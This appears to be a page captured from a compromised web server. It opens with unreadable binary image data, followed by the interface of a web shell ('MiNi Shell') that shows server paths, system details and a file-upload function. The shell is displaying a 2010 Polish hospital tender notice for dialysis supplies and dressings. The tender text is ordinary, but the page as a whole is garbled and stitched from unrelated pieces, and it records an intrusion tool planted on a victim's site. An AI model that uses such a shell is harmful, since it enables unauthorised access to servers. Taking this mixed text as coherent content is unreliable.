JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101012/328028-N-2010.html

<p class="kh_header"><b>Końskie: Produkty medyczne</b><br>
<b>Numer ogłoszenia: 328028 - 2010; data zamieszczenia: 12.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul.  Gimnazjalna 41B, 26-200 Końskie, woj. świętokrzyskie, tel. 041 3902314, faks 041 3902319.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz.konskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Produkty medyczne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Systematyczne świadczenie dostaw przez okres 12 miesięcy produktów medycznych wg. zadań; Zadanie nr 1 - linie krwi, kanikule tętnicze i żylne  
1. Linie krwi do aparatu Dialog firmy  BRAUN (linia tętnicza + linia żylna  + worek do odbioru płynów  + igła plastikowa + łącznik + zaciski na drenach)	- 7000 kpl.
2. Linie krwi do aparatu AK-95 firmy GAMBRO (linia tętnicza + linia żylna  + worek do odbioru płynów  + igła plastikowa + łącznik + zaciski na drenach)	- 500 kpl.
3. Kaniula dotętnicza (obrotowa ze skrzydełkami) 1,6 x 25 mm	szt. 7500
4. Kaniula dożylna (obrotowa ze skrzydełkami) 1,6 x 25 mm	szt. 7500
5. Kaniula dotętnicza (obrotowa ze skrzydełkami) 1,8 x 25 mm	szt. 500
6. Kaniula dożylna (obrotowa ze skrzydełkami) 1,8 x 25 mm	szt. 500
7. Kaniula dotętnicza (obrotowa ze skrzydełkami) 1,5 x 25 mm	szt. 500
8. Kaniula dożylna (obrotowa ze skrzydełkami) 1,5 x 25 mm	szt. 500
9. Kaniula FSM do dializy jednoigłowej 1,8 (obrotowa ze skrzydełkami)  szt.100
Zadanie nr 2 - dializatory kapilarne
1. Dializator kapilarny syntetyczny suchy sterylizowany parą wodną lub promieniami gamma  o powierzchni   1,2- 1,5 m2 - 600 szt.
2. Dializator kapilarny syntetyczny suchy sterylizowany parą wodną lub promieniami gamma o powierzchni   1,6- 2,0 m2 - 2100 szt.
Zadanie nr 3 - linie krwi i dializatory polisulfonowe do HDF
1. Oryginalne linie krwi do HDF on line do aparatu Dialog firmy BRAUN - 600 szt.
2. Dializatory polisulfonowe, wysokoprzepływowe do HDF o powierzchni:
a) 1,5 - 1,8m2 - 300 szt.
b) 1,9 - 2,0m2 - 300 szt.
Zadanie nr 4 - kapsuły
1. Kapsuły z koncentratem suchym węglanowym o pojemności od 650-800 ml - 6000 szt.
Zadanie nr 5 - koncentraty do dializ
1. Koncentrat kwaśny		- litrów 10 000
2. Koncentrat kwaśny z glukozą	- litrów 30 000
3. Koncentrat węglanowy		- litrów 13 000	   
Wykonawca udokumentuje jednorazowe użycie kanistrów do przechowywania koncentratów do dializ.   Wymagana  pełna oferta koncentratów  w przedziale parametrów jonowych dla potasu : od 0,0 do 5,0 mmol/l co 0,5 mmol/l, dla  wapnia:   od 0,0 do 2,5mmol/l co 0,25 mmol/l z możliwością  uzupełniania zawartości glukozy  od 1 do 2 g/l. Zamawiający zastrzega sobie możliwość indywidualnego zapotrzebowania koncentratu z dostawą do Zamawiającego w ciągu 3 dni.
Zadanie nr 6 - cewniki naczyniowe do hemodializ				
1. Cewnik naczyniowy  do hemodializ ( zestaw do kaniulizacji, dwuświatłowy, z powłoką bakteriobójczą z chlorheksydyny i sulfadiazyny srebra , ze strzykawką z otworem w tłoku ułatwiającym wprowadzenie prowadnicy bez rozłączenia systemu i łącznikiem) dł. 16-20 cm - 140 szt.
Zadanie nr 7 - opatrunki typu Pushban
1. Opatrunki typu  Pushban ze spongostanem w rozmiarach  L (25x72 mm) oraz XL. (30x72 mm) - 8000 szt.
Zadanie nr 8 - opatrunki specjalistyczne
1. Opatrunek bakteriobójczy nasączony 10% rozpuszczalnym żelem jodoforowym, nie przywierający do rany, przepuszczalny dla powietrza np. Inadine 5,0x5,0cm - 200szt.
2. Opatrunek j/w 9,5x9,5cm - 200szt.
3. Antyseptyczny opatrunek parafinowy z gazy z 0,5% roztworem octanu chlorheksydyny, nie przywierający do rany, przepuszczalny dla powietrza np.. Bactigras  5,0x5,0cm - 100szt.
4. Opatrunek j/w 10,0x10,0cm - 100szt.
5. Opatrunek j/w 15,0x20,0cm - 100szt.
6. Bakteribójczy opatrunek pokryty powłoką antybakteryjną Manuka, nieprzywiuerający do rany, przepuszczalny dla powietrza np.. Actilite 10,0x10,0cm - 100szt.
7. Opatrunek j/w 10,0x20,0cm - 50szt.
8. Jałowy opatrunek z folii poliuretanowej, przeżroczysty, półprzepuszczalny, wodoodporny, elastyczny, pokryty hypoalergicznym klejem akrylowym np.. Bioclusive 10,2x12,7cm - 250szt.
9. Opatrunek j/w 12,7x17,8cm - 500szt.
10. Opatrunek j.w 10,2x25,4cm - 100szt.
11. Przeżroczysty opatrunek z folii poliuretanowej z adhezyjną warstwą miękkiego silikonu, półprzepuszczalny, wodoodporny, elastyczny, samoprzylepny np.. Episil 12,0x12,0cm - 100szt.
12. Opatrunek j.w 15,0x20,0 - 50szt.
13. Absorpcyjny opatrunek z adhezyjną warstwą miękkiego silikonu posiadający warstwę wchłaniającą nadmiar wysięku, półprzepuszczalny, wodoodporny, elastyczny, samoprzylepny np.. Episil Absorbent 10,0x10,0cm - 30szt.
14. Opatrunek j/w 10,0x20,0cm - 30szt.
15. Czysty, amorficzny hudrożel składający się ze zmodyfikowanego polimeru karboksymetylo-celulozy, glikolu propylenowego i wody przyspieszający autolizę rany w wygodnym do użycia aplikatorze np.. Intrasite Gel 8g - 150szt.
16. Hydrożel j.w 15g - 200szt.
17. Hydrożel j.w 25g - 20szt.
18. Opatrunek z węglem aktywowanym z zawartością srebra w ilości 33 ug/cm2, aktywny wobec MRSA i VRE; zamknięty w saszetce nylonowej np.. Actisorb Silver 6,5x10,5cm - 100szt
19. Opatrunek j.w 10,5x10,5cm - 100szt.
20. Opatrunek zawierający aktywowany węgiel zdolny do pochłaniania dużej ilości mikroorganbizmów. Mający zawartość srebra działającego bakteriobójczo włącznie z MRSA i oczyszczająco na rany z dużą ilością wydzieliny. Eliminujący nieprzyjemny zapach, zamknięty w saszetce nylonowej np. Actisorb Plus 10,5x10,5cm - 250szt.
21. Opatrunek j.w 19,0x10,5cm - 100szt.
22. Opatrunek hydropolimerowy, samoprzylepny, półprzepuszczalny, hypoalergiczny, wodoodporny, elastyczny, utrzymujący wilgotne środowisko w ranie np.. Tielle 7,0x9,0cm - 100szt.
23. Opatrunek j/w 11,0x11,0cm - 100szt.
24. Opatrunek j.w  15,0x15,0cm - 100szt.
25. Opatrunek j/w 15,0x20,0cm - 100szt.
26. Opatrunek j/w 18,0x18,0cm - 100szt.
27. Opatrunek z pianki paliuretanowej przeznaczony do ran o obfitym lub bardzo obfitym wysięku, posiadającybardzo duże zdolności absorpcyjne, nie przywierający, z możliwością cięcia w celu dopasowania do rany, sterylny np.. Allevyn Plus Cavity 5,0x6,0cm - 30szt.
28. Opatrunek j. w 10,0x10,0cm - 30szt.
29. Opatrunek  z dzianiny wiskozowej z olejem mineralnym, natłuszczająco-nawilżający, nieprzywierający np.. Adaptic 7,6x7,6cm - 500szt.
30. Opatrunek j. w 7,6x20,3cm - 500szt.
31. Opatrunek j. w 7,6x40,6cm - 100szt.
32. Parafinowy opatrunek z gazy dla ran powierzchniowych np.. Jelonet 5,0x5,0cm - 30szt.
33. Opatrunek j. w 10,0x10,0cm - 30szt.
34. Gładka tkanina acetatowa pokryta warstwą hydrofobowej obojętnej maści, sterylny, stosowany przy oparzeniach i ranach powierzchniowych np.. Cuticerin 7,5x7,5cm - 100szt.
35. Opatrunek j. w 7,5x20,0cm - 100szt.
36. Opatrunek j. w 20,0x40,0cm - 50szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.18.15.20-3, 33.14.11.10-4, 33.14.12.00-2, 33.18.15.10-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Sporządzone przez Wykonawcę oświadczenie, że oferowane przedmioty zamówienia spełniają wymagania określone  odpowiednimi przepisami  i są dopuszczone do stosowania i  obrotu na terenie RP . Oświadczenie to należy potwierdzić załączeniem do oferty kserokopii właściwych dokumentów, zgodnie z obowiązującym prawem.
- w klasie I niesterylne - deklaracji zgodności CE
- w klasie I sterylnej oraz II a - deklaracji zgodności CE wraz z certyfikatem CE lub wpis lub zgłoszenie do rejestru wyrobów medycznych  podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i do używania
- w klasie II b i III czyli tzw wyroby zwiększonego ryzyka - zgłoszenie lub wpis do rejestru wyrobów medycznych  podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i do używania
 (na czołówce w górnej części  kserokopii odpowiedniego dokumentu  Wykonawca zmieści adnotacje którego zadania i pozycji  dotyczy)</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zał. nr. 3 do SIWZ wg wzoru Oświadczenie Wykonawcy o spełnieniu warunków udziału w postepowaniu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany   umowy w następujących przypadkach :
	a) - gdy podczas realizacji umowy wystąpią nieprzewidziane zdarzenia lub okoliczności które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie
b) - w przypadku zakończenia produkcji lub wycofania z rynku wyrobu będącego przedmiotem zamówienia dopuszcza się zmianę na nowy produkt o tych samych bądź lepszych parametrach po  cenie jednostkowej zaoferowanej w ofercie.
c) - zmianę osób reprezentujących strony i odpowiedzialnych  za  realizację postanowień umowy 
d) - zmianę rachunku bankowego i innych danych stron
e) - zmiany stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoz.konskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Opieki Zdrowotnej
26-200 Końskie
ul. Gimnazjalna 41B
DSU i ZP niski parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2010 godzina 10:45, miejsce: SEKRETARIAT
Zespołu Opieki Zdrowotnej
26-200 Końskie
ul. Gimnazjalna 41B.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Linie krwi, kaniule tętnicze i żylne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Systematyczne dostawy przez okres 12 miesięcy linii krwi, kaniul tętniczych i żylnych wg opisu z zad. nr. 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.15.20-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dializatory kapilarne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Systematyczne dostawy przez okres 12 miesięcy dializatorów kapilarnych wg opisu z zad. nr. 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.15.20-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Linie krwi do HDF i dializatory polisulfonowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Systematyczne dostawy przez okres 12 miesięcy linii krwi do HDF i dializatorów polisulfonowych wg opisu z zad. nr. 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.15.20-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> kapsuły.</p>
